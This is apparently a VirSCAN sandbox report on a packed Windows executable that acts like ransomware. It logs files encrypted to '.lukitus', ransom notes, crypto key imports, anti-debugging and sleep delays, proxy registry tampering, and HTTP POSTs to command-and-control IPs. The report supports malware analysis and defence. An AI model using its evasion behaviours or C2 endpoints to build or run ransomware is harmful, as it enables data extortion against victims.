VirSCAN VirSCAN

1, You can UPLOAD any files, but there is 20Mb limit per file.
2, VirSCAN supports Rar/Zip decompression, but it must be less than 20 files.
3, Aplikace VirSCAN může skenovat komprimované soubory s heslem 'infected'nebo'virus'.

Language
Server load
Server Load

File information
Safety rating:21
Behavior list
Basic Information
MD5:d7735c779ae63c639d3ccb6d432c5704
file type:EXE
Production company:
version:
Shell or compiler information:PACKER:UPolyX v0.5
Key behavior
Behavior description:设置特殊文件夹属性
details:C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies
C:\Users\Administrator\AppData\Local\Microsoft\Windows\History\History.IE5
Behavior description:疑似加密敲诈行为
details:N/A
N/A
Behavior description:在桌面创建文件
details:C:\Users\Administrator\Desktop\IT40E96B-3GS1-938B-57D110CA-FD3BA3252509.lukitus
Behavior description:获取TickCount值
details:TickCount = 211953, SleepMilliseconds = 23000.
TickCount = 211968, SleepMilliseconds = 23000.
TickCount = 212062, SleepMilliseconds = 23000.
TickCount = 212093, SleepMilliseconds = 23000.
TickCount = 212109, SleepMilliseconds = 23000.
TickCount = 212125, SleepMilliseconds = 23000.
TickCount = 212140, SleepMilliseconds = 23000.
TickCount = 212156, SleepMilliseconds = 23000.
TickCount = 212171, SleepMilliseconds = 23000.
TickCount = 212187, SleepMilliseconds = 23000.
TickCount = 212312, SleepMilliseconds = 23000.
TickCount = 212343, SleepMilliseconds = 23000.
TickCount = 212359, SleepMilliseconds = 23000.
TickCount = 212375, SleepMilliseconds = 23000.
TickCount = 212390, SleepMilliseconds = 23000.
File behavior
Behavior description:创建文件
details:C:\Python\Python27\Lib\test\IT40E96B-3GS1-938B-961CD716-851E9434D7C0.lukitus
C:\Python\Python27\Lib\test\lukitus-68f8.htm
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-49CC9D76-79C60E59D55E.lukitus
C:\Python\Python36\Lib\test\lukitus-e33b.htm
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-0B4FAC60-A0CA8A33C466.lukitus
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-D71BB6AE-D8F9CEE493AA.lukitus
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-A08602F4-A350288864B2.lukitus
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-83A81DBC-F3AD4E96C533.lukitus
C:\Python\Python36\Lib\site-packages\pip\_vendor\requests\IT40E96B-3GS1-938B-E92C2EDF-D32FEEC6D8C9.lukitus
C:\Python\Python36\Lib\site-packages\pip\_vendor\requests\lukitus-7431.htm
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-69B67E7F-142602E13EB2.lukitus
C:\Python\Python27\Lib\test\IT40E96B-3GS1-938B-FC626B56-7A6C2DACA1D3.lukitus
C:\Python\Python27\Lib\test\IT40E96B-3GS1-938B-1E1B0B64-49B4F92876DF.lukitus
C:\Python\Python27\Lib\test\IT40E96B-3GS1-938B-A3822D79-2C187CF66801.lukitus
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-1698ADE9-4393DC62ABE7.lukitus
Behavior description:查找文件
details:FileName = C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk
FileName = C:\ProgramData\Microsoft\Network\Connections\Pbk\*.pbk
FileName = C:\Windows\system32\Ras\*.pbk
FileName = C:\Users\Administrator\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk
FileName = C:\Users\Administrator\AppData\Roaming\Microsoft\Network\Connections\Pbk\*.pbk
FileName = c:\*
FileName = d:\*
FileName = c:\AnalyzeControl\*
FileName = c:\DiskD\*
FileName = c:\DiskX\*
FileName = c:\monitor\*
FileName = c:\MSOCache\*
FileName = c:\MSOCache\All Users\*
FileName = x:\*
FileName = c:\MSOCache\All Users\{90120000-0011-0000-0000-0000000FF1CE}-C\*
Behavior description:删除文件
details:C:\Python\Python27\Lib\test\DE3D94BA576F97E699A4CBEFECA8C458.tmp
C:\Python\Python36\Lib\test\AE3479040DA3E84D62E5CB176A22AC22.tmp
C:\Python\Python36\Lib\test\7A2FE9E43A0BC01651E979ECA33A7A55.tmp
C:\Python\Python36\Lib\test\21A243005D82172A8EA608708E5A2717.tmp
C:\Python\Python36\Lib\test\196E66512BB03B15E7BE11EB1CE4F29D.tmp
C:\Python\Python36\Lib\test\55D799655E658BF6A98D67A8C5B830B3.tmp
C:\Python\Python36\Lib\site-packages\pip\_vendor\requests\0B776691E09DEF180E76819E6BE5ECA0.tmp
C:\Python\Python36\Lib\test\8AF544AE3F2F2762333BBA0B32AEE881.tmp
C:\Python\Python27\Lib\test\AA70BF9198B682C6F870B792F6C9370F.tmp
C:\Python\Python27\Lib\test\1012F134CCACAA8B989E12AEC33E3870.tmp
C:\Python\Python27\Lib\test\6D1B188D1439AF531473C5FA79EA2189.tmp
C:\Python\Python36\Lib\test\A93054DFC9CB838A6D17102AFDC3670E.tmp
C:\Python\Python36\Lib\test\BEF02246FF1FE8D40B0BA0B27AB6F912.tmp
C:\Python\Python36\Lib\test\2B64BC01031A2B9B3E4A9766689D9715.tmp
C:\Python\Python27\Lib\test\6C69DA89D1FF6EBC534E528EF8048D22.tmp
Behavior description:在桌面创建文件
details:C:\Users\Administrator\Desktop\IT40E96B-3GS1-938B-57D110CA-FD3BA3252509.lukitus
Behavior description:重命名文件
details:C:\Python\Python27\Lib\test\badkey.pem ---> c:\Python\Python27\Lib\test\DE3D94BA576F97E699A4CBEFECA8C458.tmp
C:\Python\Python36\Lib\test\dh1024.pem ---> c:\Python\Python36\Lib\test\AE3479040DA3E84D62E5CB176A22AC22.tmp
C:\Python\Python36\Lib\test\nullbytecert.pem ---> c:\Python\Python36\Lib\test\7A2FE9E43A0BC01651E979ECA33A7A55.tmp
C:\Python\Python36\Lib\test\keycert2.pem ---> c:\Python\Python36\Lib\test\21A243005D82172A8EA608708E5A2717.tmp
C:\Python\Python36\Lib\test\badkey.pem ---> c:\Python\Python36\Lib\test\196E66512BB03B15E7BE11EB1CE4F29D.tmp
C:\Python\Python36\Lib\test\badcert.pem ---> c:\Python\Python36\Lib\test\55D799655E658BF6A98D67A8C5B830B3.tmp
C:\Python\Python36\Lib\site-packages\pip\_vendor\requests\cacert.pem ---> c:\Python\Python36\Lib\site-packages\pip\_vendor\requests\0B776691E09DEF180E76819E6BE5ECA0.tmp
C:\Python\Python36\Lib\test\keycert4.pem ---> c:\Python\Python36\Lib\test\8AF544AE3F2F2762333BBA0B32AEE881.tmp
C:\Python\Python27\Lib\test\nokia.pem ---> c:\Python\Python27\Lib\test\AA70BF9198B682C6F870B792F6C9370F.tmp
C:\Python\Python27\Lib\test\nullbytecert.pem ---> c:\Python\Python27\Lib\test\1012F134CCACAA8B989E12AEC33E3870.tmp
C:\Python\Python27\Lib\test\nullcert.pem ---> c:\Python\Python27\Lib\test\6D1B188D1439AF531473C5FA79EA2189.tmp
C:\Python\Python36\Lib\test\allsans.pem ---> c:\Python\Python36\Lib\test\A93054DFC9CB838A6D17102AFDC3670E.tmp
C:\Python\Python36\Lib\test\keycert.pem ---> c:\Python\Python36\Lib\test\BEF02246FF1FE8D40B0BA0B27AB6F912.tmp
C:\Python\Python36\Lib\test\keycert3.pem ---> c:\Python\Python36\Lib\test\2B64BC01031A2B9B3E4A9766689D9715.tmp
C:\Python\Python27\Lib\test\pycacert.pem ---> c:\Python\Python27\Lib\test\6C69DA89D1FF6EBC534E528EF8048D22.tmp
Behavior description:设置特殊文件夹属性
details:C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies
C:\Users\Administrator\AppData\Local\Microsoft\Windows\History\History.IE5
Behavior description:修改文件内容
details:C:\Python\Python27\Lib\test\IT40E96B-3GS1-938B-961CD716-851E9434D7C0.lukitus ---> Offset = 0
C:\Python\Python27\Lib\test\IT40E96B-3GS1-938B-961CD716-851E9434D7C0.lukitus ---> Offset = 2202
C:\Python\Python27\Lib\test\badkey.pem ---> Offset = 0
C:\Python\Python27\Lib\test\lukitus-68f8.htm ---> Offset = 0
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-49CC9D76-79C60E59D55E.lukitus ---> Offset = 0
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-49CC9D76-79C60E59D55E.lukitus ---> Offset = 307
C:\Python\Python36\Lib\test\dh1024.pem ---> Offset = 0
C:\Python\Python36\Lib\test\lukitus-e33b.htm ---> Offset = 0
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-0B4FAC60-A0CA8A33C466.lukitus ---> Offset = 0
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-0B4FAC60-A0CA8A33C466.lukitus ---> Offset = 5525
C:\Python\Python36\Lib\test\nullbytecert.pem ---> Offset = 0
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-D71BB6AE-D8F9CEE493AA.lukitus ---> Offset = 0
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-D71BB6AE-D8F9CEE493AA.lukitus ---> Offset = 1826
C:\Python\Python36\Lib\test\keycert2.pem ---> Offset = 0
C:\Python\Python36\Lib\test\IT40E96B-3GS1-938B-A08602F4-A350288864B2.lukitus ---> Offset = 0
Network behavior
Behavior description:连接指定站点
details:InternetConnectA: ServerName = **.219.29.**, PORT = 80, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0008, Flags = 0x00000000
InternetConnectA: ServerName = **.183.165.**, PORT = 80, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0008, Flags = 0x00000000
InternetConnectA: ServerName = **.120.110.**, PORT = 80, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0008, Flags = 0x00000000
Behavior description:打开HTTP连接
details:InternetOpenA: UserAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2), hSession = 0x00cc0004
Behavior description:建立到一个指定的套接字连接
details:IP: **.219.29.**:80, SOCKET = 0x000002a8
IP: **.183.165.**:80, SOCKET = 0x000002a8
IP: **.120.110.**:80, SOCKET = 0x000002a8
Behavior description:发送HTTP包
details:POST /imageload.cgi HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://91.219.29.46/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Host: **.219.29.** Content-Length: 1022 Connection: Keep-Alive
POST /imageload.cgi HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://46.183.165.45/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Host: **.183.165.** Content-Length: 1022 Connection: Keep-Alive
POST /imageload.cgi HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://146.120.110.46/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Host: **.120.110.** Content-Length: 1022 Connection: Keep-Alive
Behavior description:打开HTTP请求
details:HttpOpenRequestA: **.219.29.**:80/imageload.cgi, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: POST, Referer: , Flags = 0x844c0300
HttpOpenRequestA: **.183.165.**:80/imageload.cgi, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: POST, Referer: , Flags = 0x844c0300
HttpOpenRequestA: **.120.110.**:80/imageload.cgi, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: POST, Referer: , Flags = 0x844c0300
Registry behavior
Behavior description:修改注册表
details:\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\b70c_RASAPI32\EnableFileTracing
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\b70c_RASAPI32\EnableConsoleTracing
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\b70c_RASAPI32\FileTracingMask
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\b70c_RASAPI32\ConsoleTracingMask
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\b70c_RASAPI32\MaxFileSize
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\b70c_RASAPI32\FileDirectory
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\b70c_RASMANCS\EnableFileTracing
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\b70c_RASMANCS\EnableConsoleTracing
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\b70c_RASMANCS\FileTracingMask
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\b70c_RASMANCS\ConsoleTracingMask
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\b70c_RASMANCS\MaxFileSize
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\b70c_RASMANCS\FileDirectory
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Behavior description:删除注册表键值
details:\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
Other behavior
Behavior description:检测自身是否被调试
details:IsDebuggerPresent
Behavior description:创建互斥体
details:RasPbFile
Behavior description:枚举网络共享资源
details:N/A
Behavior description:创建事件对象
details:EventName = Global\7a9a8a6aBaDa3a4a3aCa2aFa:a:aEaFa
EventName = Local\7a9a8a6aBaDa3a4a3aCa2aFa:a:aEaFa
Behavior description:疑似加密敲诈行为
details:N/A
N/A
Behavior description:加密数据
details:[CryptEncrypt] Data: 0x0012F6F4, PlainTextLen: 128, CipherTextLen: 128, Flags: 0x00000000
[CryptEncrypt] Data: 0x015AF6DC, PlainTextLen: 256, CipherTextLen: 256, Flags: 0x00000000
Behavior description:获取TickCount值
details:TickCount = 211953, SleepMilliseconds = 23000.
TickCount = 211968, SleepMilliseconds = 23000.
TickCount = 212062, SleepMilliseconds = 23000.
TickCount = 212093, SleepMilliseconds = 23000.
TickCount = 212109, SleepMilliseconds = 23000.
TickCount = 212125, SleepMilliseconds = 23000.
TickCount = 212140, SleepMilliseconds = 23000.
TickCount = 212156, SleepMilliseconds = 23000.
TickCount = 212171, SleepMilliseconds = 23000.
TickCount = 212187, SleepMilliseconds = 23000.
TickCount = 212312, SleepMilliseconds = 23000.
TickCount = 212343, SleepMilliseconds = 23000.
TickCount = 212359, SleepMilliseconds = 23000.
TickCount = 212375, SleepMilliseconds = 23000.
TickCount = 212390, SleepMilliseconds = 23000.
Behavior description:打开事件
details:HookSwitchHookEnabledEvent
\KernelObjects\MaximumCommitCondition
\INSTALLATION_SECURITY_HOLD
\SECURITY\LSA_AUTHENTICATION_INITIALIZED
Global\SvcctrlStartEvent_A3752DX
Global\TermSrvReadyEvent
MSFT.VSA.COM.DISABLE.2724
MSFT.VSA.IEC.STATUS.6c736db0
Behavior description:调用Sleep函数
details:[1]: MilliSeconds = 23000.
[2]: MilliSeconds = 60000.
[3]: MilliSeconds = 60000.
[4]: MilliSeconds = 60000.
[5]: MilliSeconds = 60000.
[6]: MilliSeconds = 0.
Behavior description:打开互斥体
details:Global\7a9a8a6aBaDa3a4a3aCa2aFa:a:aEaFa
Local\7a9a8a6aBaDa3a4a3aCa2aFa:a:aEaFa
Local\_!MSFTHISTORY!_
Local\c:!users!administrator!appdata!local!microsoft!windows!temporary internet files!content.ie5!
Local\c:!users!administrator!appdata!roaming!microsoft!windows!cookies!
Local\c:!users!administrator!appdata!local!microsoft!windows!history!history.ie5!
Local\WininetStartupMutex
Local\WininetConnectionMutex
Local\WininetProxyRegistryMutex
RasPbFile
Behavior description:导入密钥
details:[CryptImportKey] Algorithm: CALG_RSA_KEYX (0x0000a400), Data: 0x0012FC24, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RC2 (0x00006602), Data: 0x0012F36C, DataLen: 140, Flags: 0x00000100
[CryptImportKey] Algorithm: CALG_RSA_KEYX (0x0000a400), Data: 0x018D14A8, DataLen: 276, Flags: 0x00000000
Run screenshot
VirSCAN

About VirSCAN | Privacy Policy | Contact us | Links | Help VirSCAN
中国反网络病毒联盟
Powered By CentOSpol

京ICP备11007605号-12

pol

京公网安备 11010802020746号